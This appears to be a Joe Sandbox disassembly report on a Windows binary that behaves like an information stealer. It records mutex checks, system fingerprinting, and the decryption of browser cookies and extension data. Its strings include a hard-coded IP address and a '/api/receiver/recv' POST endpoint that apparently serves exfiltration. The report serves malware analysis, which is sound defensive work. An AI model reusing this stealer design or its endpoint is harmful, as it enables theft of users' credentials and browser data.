                                                  control_flow_graph 75 2c8d40-2c8d5d call 2c1ea0 78 2c8ed5-2c8ed8 75->78 79 2c8d63-2c8da6 call 2c2360 FindFirstFileW call 2c2250 75->79 84 2c8dac-2c8dd1 call 2c2250 * 2 79->84 85 2c8ec9-2c8ed2 call 2c1ee0 79->85 92 2c8de8-2c8dec 84->92 93 2c8dd3-2c8de6 84->93 85->78 95 2c8e1d-2c8e47 call 2c2360 92->95 96 2c8dee-2c8e01 92->96 93->92 94 2c8e18 93->94 98 2c8ea6-2c8eb9 FindNextFileW 94->98 109 2c8e48 call 2c1110 95->109 110 2c8e48 call 2c1380 95->110 96->95 97 2c8e03-2c8e16 96->97 97->94 97->95 98->84 100 2c8ebf-2c8ec3 FindClose 98->100 100->85 102 2c8e4b-2c8e54 103 2c8e9a-2c8ea2 102->103 104 2c8e56-2c8e5c 102->104 103->98 104->103 105 2c8e5e-2c8e68 104->105 105->103 106 2c8e6a-2c8e89 call 2c8d40 105->106 108 2c8e8e-2c8e97 106->108 108->103 109->102 110->102
                                                  APIs
                                                    • Part of subcall function 002C1EA0: RtlAllocateHeap.NTDLL(030F0000,00000008,002C3D82), ref: 002C1EB0
                                                  • FindFirstFileW.KERNELBASE(00000000,?), ref: 002C8D83
                                                  • FindNextFileW.KERNELBASE(000000FF,?), ref: 002C8EB1
                                                  • FindClose.KERNEL32(000000FF), ref: 002C8EC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: Find$File$AllocateCloseFirstHeapNext
                                                  • String ID: %s\%s$%s\*
                                                  • API String ID: 2963102669-2848263008
                                                  • Opcode ID: 11225f78700ce2bb91e34cc1a8641d713e139db15a6b291b32430e52ac0e5f26
                                                  • Instruction ID: e9eb8b000212b60252212f05ff8ae27cbdc1dde6beda3f556a97388ad44aee50
                                                  • Opcode Fuzzy Hash: 11225f78700ce2bb91e34cc1a8641d713e139db15a6b291b32430e52ac0e5f26
                                                  • Instruction Fuzzy Hash: 7341F0B5D00259EBCB14DFA4DD59EEF77B9AF48300F1086ACF90597282EA349B20CB51

                                                  Control-flow Graph

                                                  control_flow_graph 111 2c17e0-2c1843 112 2c184e-2c1857 111->112 113 2c1845-2c184b 111->113 114 2c185d-2c188a call 2c2130 call 2c90f0 112->114 115 2c18e2-2c18e6 112->115 113->112 127 2c188c-2c1895 114->127 128 2c1899-2c18a0 114->128 116 2c18ef-2c1916 115->116 117 2c18e8-2c18ea 115->117 120 2c191c-2c1925 116->120 121 2c1a16 116->121 122 2c1a19-2c1a1c 117->122 120->121 124 2c192b-2c1931 120->124 121->122 126 2c1938-2c1944 124->126 129 2c1946-2c195e 126->129 130 2c1960-2c19c9 126->130 127->115 133 2c18cb-2c18dd 128->133 134 2c18a2-2c18c8 GlobalHandle 128->134 129->126 131 2c19cb-2c19dc 130->131 132 2c19f7-2c1a12 LoadLibraryA GetProcAddress 130->132 135 2c19de-2c19ef 131->135 136 2c19f1-2c19f4 131->136 132->122 133->113 134->133 135->131 136->132
                                                  APIs
                                                  • GlobalHandle.KERNEL32(00000000), ref: 002C18C8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: GlobalHandle
                                                  • String ID: l
                                                  • API String ID: 1075865800-2517025534
                                                  • Opcode ID: 52e9c71b1fa2cd143679c5b526a2421662126662f1811ae3ceab4e50f04fbb10
                                                  • Instruction ID: cc68cf033135bbda90f6d6e4d05995856aa8335abcf9b9984274095ae9c69edc
                                                  • Opcode Fuzzy Hash: 52e9c71b1fa2cd143679c5b526a2421662126662f1811ae3ceab4e50f04fbb10
                                                  • Instruction Fuzzy Hash: 7D91C574E14209DFCF08CF98D591AADBBB2FF49308F248299D915AB341D730AA61DF94

                                                  Control-flow Graph

                                                  control_flow_graph 217 2c8ca0-2c8cbf GetSystemInfo
                                                  APIs
                                                  • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,002C3271,G1,), ref: 002C8CAA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem
                                                  • String ID: q2,
                                                  • API String ID: 31276548-1977279463
                                                  • Opcode ID: 25ad2b0ab2ce64ca51f34b66d374439bdee96eda7ad683cbb3a254ace98418bc
                                                  • Instruction ID: e77791923c1b178b8bde7abc6768b80d21f3ab662a2dc8dc30610239e252bb3b
                                                  • Opcode Fuzzy Hash: 25ad2b0ab2ce64ca51f34b66d374439bdee96eda7ad683cbb3a254ace98418bc
                                                  • Instruction Fuzzy Hash: EDD0A97490520C8BCB00DF90D84889AB7FDAB48204F0081A4DC4C47300EA32A9128BD1
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: aff3bf203213e3ffffd20615bcfe2e4d16dffa8ae5426f080bec32a5c75d23b9
                                                  • Instruction ID: 3df805bcf11f3f5737b13c94422149d0af67da5f15029f59ff0ca1c92982ced3
                                                  • Opcode Fuzzy Hash: aff3bf203213e3ffffd20615bcfe2e4d16dffa8ae5426f080bec32a5c75d23b9
                                                  • Instruction Fuzzy Hash: 3F41F130A04245DBDB04CFA4D852FA9BBB6AB85300F2486ACE5054B7DAD776DF22DB50

                                                  Control-flow Graph

                                                  control_flow_graph 29 2c2810-2c2855 31 2c285c-2c28c1 29->31 32 2c2857 29->32 39 2c28c5-2c28e7 CreateThread 31->39 40 2c28c3 31->40 33 2c291a 32->33 34 2c291c-2c291f 33->34 41 2c28e9 39->41 42 2c28eb-2c290f CreateThread 39->42 40->33 41->33 43 2c2911 42->43 44 2c2913-2c2918 42->44 43->33 44->34
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0u$0u0u$0u0u$45.125.66.18$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.4$`
                                                  • API String ID: 0-2265949662
                                                  • Opcode ID: 246dab2c0c077406006ee31f18edc054d999c4aa49dc5c436772e8ad964fcb59
                                                  • Instruction ID: a1ef4831213b2e4fff8f378288b585d1017f0a7749b56c92f562b8b0a9c729e8
                                                  • Opcode Fuzzy Hash: 246dab2c0c077406006ee31f18edc054d999c4aa49dc5c436772e8ad964fcb59
                                                  • Instruction Fuzzy Hash: 73310675650308EFE710CF50DC4AFA9BB65AB08741F20C248FA09AF2D0C7B5AA85CB95

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateMutexA.KERNELBASE(00000000,00000000,082e2202-17f7-4654-a651-ac9a3778e1d7), ref: 002C1D43
                                                  • GetLastError.KERNEL32 ref: 002C1D52
                                                  • Sleep.KERNELBASE(00001388), ref: 002C1E1C
                                                  • CloseHandle.KERNEL32(00000000), ref: 002C1E3A
                                                  • ExitProcess.KERNEL32 ref: 002C1E42
                                                  Strings
                                                  • 082e2202-17f7-4654-a651-ac9a3778e1d7, xrefs: 002C1D3A
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateErrorExitHandleLastMutexProcessSleep
                                                  • String ID: 082e2202-17f7-4654-a651-ac9a3778e1d7
                                                  • API String ID: 168847217-1460249064
                                                  • Opcode ID: 0c446571103aac71dd8d0aa3ea9a22ff7e5ac839dbfb8f3f43a5a864172c0adb
                                                  • Instruction ID: b3b481e271f916456f26ad6dbbfc955c16c64c74854772c1c444a13c37d84850
                                                  • Opcode Fuzzy Hash: 0c446571103aac71dd8d0aa3ea9a22ff7e5ac839dbfb8f3f43a5a864172c0adb
                                                  • Instruction Fuzzy Hash: 6831C1B1C102199BDB24DFA4AC4BFED7775AB05344F10426EE905B2182DB709A74DBA2

                                                  Control-flow Graph

                                                  control_flow_graph 137 2c2e60-2c2e66 138 2c2e6d-2c2e74 137->138 139 2c30af-2c30b2 138->139 140 2c2e7a-2c2e80 138->140 141 2c2e8e-2c2e97 140->141 142 2c2e9d-2c2ea9 141->142 143 2c309f-2c30aa Sleep 141->143 144 2c2eaf-2c2ebe 142->144 145 2c309a 142->145 143->138 146 2c2ed5-2c2ef8 call 2c91d0 144->146 147 2c2ec0-2c2ecf 144->147 145->143 150 2c2efa-2c2f0b call 2c2920 146->150 151 2c2f10-2c2f2c 146->151 147->145 147->146 157 2c2e82-2c2e8a 150->157 153 2c2f32-2c2f6e 151->153 154 2c2fc3-2c2ff0 call 2c1ea0 151->154 160 2c2f87-2c2faa 153->160 161 2c2f70-2c2f82 153->161 164 2c3009-2c3061 154->164 165 2c2ff2-2c2ffd 154->165 157->141 160->154 166 2c2fac-2c2fb7 160->166 161->157 167 2c3068-2c306f 164->167 165->164 166->154 168 2c3088-2c3093 167->168 169 2c3071-2c307c 167->169 168->145 169->168
                                                  APIs
                                                  • Sleep.KERNELBASE(000003E8), ref: 002C30A4
                                                    • Part of subcall function 002C1EA0: RtlAllocateHeap.NTDLL(030F0000,00000008,002C3D82), ref: 002C1EB0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeapSleep
                                                  • String ID: /api/receiver/recv$Content-Type: application/octet-stream$POST
                                                  • API String ID: 4201116106-1595302217
                                                  • Opcode ID: a2debb93d20603d0cbf1be862071cce3b593672e4fdae44b9e880211d9e66e5a
                                                  • Instruction ID: b01c3b2c952f7d1a91513ddcbd411ecdb2e27e962a1ef9f9e6d02884b5f3dc2e
                                                  • Opcode Fuzzy Hash: a2debb93d20603d0cbf1be862071cce3b593672e4fdae44b9e880211d9e66e5a
                                                  • Instruction Fuzzy Hash: 477137B8A10219EBCB14CF44D544FB9BBB1BF48314F20869CE9465B381DB75EE91DB90

                                                  Control-flow Graph

                                                  control_flow_graph 170 2c8cc0-2c8cd2 GetPhysicallyInstalledSystemMemory 171 2c8cd4-2c8ceb call 2c9260 170->171 172 2c8cf2-2c8cf5 170->172 171->172
                                                  APIs
                                                  • GetPhysicallyInstalledSystemMemory.KERNELBASE(e2,,002C3265,G1,,?,?,?,?,?,?,?,?,?,002C3147), ref: 002C8CCA
                                                  • __aulldiv.LIBCMT ref: 002C8CE3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000017.00000002.2744616304.00000000002C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 002C0000, based on PE: true
                                                  • Associated: 00000017.00000002.2744522121.00000000002C0000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744745377.00000000002CA000.00000002.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744780989.00000000002CB000.00000004.00000001.01000000.0000000E.sdmp
                                                  • Associated: 00000017.00000002.2744872211.00000000002CC000.00000002.00000001.01000000.0000000E.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_23_2_2c0000_rapnewsa.jbxd
                                                  Similarity
                                                  • API ID: InstalledMemoryPhysicallySystem__aulldiv
                                                  • String ID: e2,
                                                  • API String ID: 3833932492-1861609547

                                                  Control-flow Graph

                                                  control_flow_graph 200 2c3ef0-2c3f10 VirtualAlloc 201 2c3f16-2c3f33 VirtualAlloc 200->201 202 2c3f12-2c3f14 200->202 204 2c3f39-2c3f56 VirtualAlloc 201->204 205 2c3f35-2c3f37 201->205 203 2c3f61-2c3f62 202->203 206 2c3f5c 204->206 207 2c3f58-2c3f5a 204->207 205->203 206->203 207->203
                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,002C3D5B,?,002C1D86,?), ref: 002C3EFE
                                                  • VirtualAlloc.KERNELBASE(00000000,00000015,00003000,00000040,?,002C3D5B,?,002C1D86,?), ref: 002C3F21
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0

                                                  Control-flow Graph

                                                  control_flow_graph 208 2c12f0-2c1305 209 2c1327-2c1353 call 2c8d40 208->209 210 2c1307-2c1321 SHGetFolderPathW 208->210 213 2c1355-2c1361 call 2c3a20 209->213 214 2c1370-2c1373 209->214 210->209 216 2c1366-2c1369 213->216 216->214
                                                  APIs
                                                  • SHGetFolderPathW.SHELL32(00000000,000000FF,00000000,00000000,)',@), ref: 002C1321
                                                  Strings
                                                  Similarity
                                                  • API ID: FolderPath
                                                  • String ID: )',@
                                                  • API String ID: 1514166925-2391885299

                                                  Control-flow Graph

                                                  control_flow_graph 218 2c2c09-2c2c10 219 2c2cd5-2c2cdc 218->219 220 2c2c16-2c2c6b call 2c91d0 218->220 222 2c2d76-2c2d7d 219->222 223 2c2ce2-2c2d06 219->223 239 2c2c6d-2c2c74 220->239 240 2c2cc4-2c2cc9 220->240 224 2c2d7f-2c2d83 222->224 225 2c2d93-2c2d9a 222->225 227 2c2d08-2c2d0f 223->227 228 2c2d29-2c2d4c call 2c2060 223->228 229 2c2d85-2c2d8a 224->229 230 2c2d91 224->230 231 2c2d9c-2c2d9f 225->231 232 2c2da6-2c2da9 225->232 233 2c2d1b-2c2d27 call 2c1ee0 227->233 234 2c2d11-2c2d14 227->234 242 2c2d4e-2c2d6d 228->242 243 2c2d74 228->243 229->230 230->232 231->232 233->243 234->233 244 2c2c88-2c2c92 239->244 245 2c2c76-2c2c7d 239->245 246 2c2cd0 240->246 242->243 243->232 248 2c2c9c 244->248 249 2c2c94-2c2c96 ExitProcess 244->249 245->244 247 2c2c7f-2c2c86 245->247 246->232 247->244 250 2c2c9e-2c2ca5 247->250 248->240 251 2c2ca7-2c2cae 250->251 252 2c2cb0-2c2cba 250->252 251->240 251->252 252->240 253 2c2cbc-2c2cbe ExitProcess 252->253
                                                  APIs
                                                    • Part of subcall function 002C91D0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002C91FE
                                                  • ExitProcess.KERNEL32 ref: 002C2C96
                                                  • ExitProcess.KERNEL32 ref: 002C2CBE
                                                  Similarity
                                                  • API ID: ExitProcess$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 2431947247-0

                                                  Control-flow Graph

                                                  control_flow_graph 254 2c8c70-2c8c96 KiUserCallbackDispatcher GetSystemMetrics
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(00000000), ref: 002C8C75
                                                  • GetSystemMetrics.USER32(00000001), ref: 002C8C86
                                                  Similarity
                                                  • API ID: CallbackDispatcherMetricsSystemUser
                                                  • String ID:
                                                  • API String ID: 365337688-0

                                                  Control-flow Graph

                                                  control_flow_graph 255 2c1110-2c1127 256 2c112d-2c1187 call 2c2170 call 2c2250 call 2c90f0 255->256 257 2c12e5-2c12e8 255->257 264 2c1189-2c11ab call 2c36d0 256->264 265 2c11b0-2c11b4 256->265 269 2c12d9-2c12e2 call 2c1ee0 264->269 267 2c11bf-2c11c9 265->267 268 2c11cf-2c11e1 267->268 267->269 271 2c11e5-2c11fa 268->271 272 2c11e3 268->272 269->257 275 2c11fc-2c1200 271->275 276 2c1238-2c123c 271->276 272->267 275->276 278 2c1202-2c1209 call 2c90b0 275->278 279 2c123e-2c1252 276->279 280 2c1254-2c1268 276->280 286 2c120e-2c1218 278->286 279->280 282 2c1280-2c12ba call 2c36d0 279->282 283 2c126a-2c127e 280->283 284 2c12d4 280->284 289 2c12bc-2c12c6 282->289 290 2c12d2 282->290 283->282 283->284 284->269 286->276 288 2c121a-2c1235 call 2c2250 call 2c90f0 286->288 288->276 289->290 292 2c12c8-2c12cc DeleteFileW 289->292 290->269 292->290
                                                  APIs
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0

                                                  Control-flow Graph

                                                  control_flow_graph 296 2c1060-2c1083 297 2c10a4-2c10c3 call 2c8d40 296->297 298 2c1085-2c109e SHGetFolderPathW 296->298 300 2c10c8-2c10cf 297->300 298->297 301 2c10fd-2c1100 300->301 302 2c10d1-2c10f6 call 2c1ec0 call 2c2b10 300->302 302->301
                                                  APIs
                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,-00000209), ref: 002C109E
                                                  Similarity
                                                  • API ID: FolderPath
                                                  • String ID:
                                                  • API String ID: 1514166925-0
                                                  APIs
                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 002C8BA0
                                                  Similarity
                                                  • API ID: CurrentProfile
                                                  • String ID:
                                                  • API String ID: 2104809126-0
                                                  APIs
                                                  • ExitProcess.KERNEL32 ref: 002C1CD0
                                                    • Part of subcall function 002C1E50: HeapCreate.KERNELBASE(00000000,00000000,00000000,?,002C1CB1,?,002C1D86,?), ref: 002C1E59
                                                  Similarity
                                                  • API ID: CreateExitHeapProcess
                                                  • String ID:
                                                  • API String ID: 611137554-0
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(030F0000,00000000,00000000,02E80000), ref: 002C1EFE
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  APIs
                                                  • HeapCreate.KERNELBASE(00000000,00000000,00000000,?,002C1CB1,?,002C1D86,?), ref: 002C1E59
                                                  Similarity
                                                  • API ID: CreateHeap
                                                  • String ID:
                                                  • API String ID: 10892065-0
                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(030F0000,00000008,002C3D82), ref: 002C1EB0
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  APIs
                                                  • Sleep.KERNELBASE(000003E8), ref: 002C2E41
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  APIs
                                                  • Sleep.KERNELBASE(00000001,00000C58,00000001), ref: 002C2AF6
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  APIs
                                                  • NtQueryObject.NTDLL(002C1593,00000001,?,00000000,00000000), ref: 002C166E
                                                  • NtQueryObject.NTDLL(002C1593,00000001,?,00000000,00000000), ref: 002C1689
                                                  Strings
                                                  Similarity
                                                  • API ID: ObjectQuery
                                                  • String ID: \Local Extensions Settings\$\Network\Cookies
                                                  • API String ID: 2748340528-1141476384
                                                  APIs
                                                  • CryptSignHashA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,002C16EB,?,002C1CA8,?,002C1D86,?), ref: 002C1C53
                                                  • CryptUpdateProtectedState.CRYPT32(00000000,00000000,00000000,00000000,00000000,?,002C16EB,?,002C1CA8,?,002C1D86,?), ref: 002C1C63
                                                  • WinHttpTimeFromSystemTime.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,002C16EB,?,002C1CA8,?,002C1D86,?), ref: 002C1C6C
                                                  Similarity
                                                  • API ID: CryptTime$FromHashHttpProtectedSignStateSystemUpdate
                                                  • String ID:
                                                  • API String ID: 3068283267-0
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ?2,$?2,
                                                  • API String ID: 0-1359727664
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(00000040,00000000,00000000,00000000,00000000,00000000,?), ref: 002C1033
                                                    • Part of subcall function 002C32A0: LocalFree.KERNEL32(?), ref: 002C33BA
                                                  Similarity
                                                  • API ID: CryptDataFreeLocalUnprotect
                                                  • String ID:
                                                  • API String ID: 1561624719-0
                                                  APIs
                                                  Strings
                                                  Similarity
                                                  • API ID: Cnd_initstd::_
                                                  • String ID: O,$O,
                                                  • API String ID: 1955959516-439060946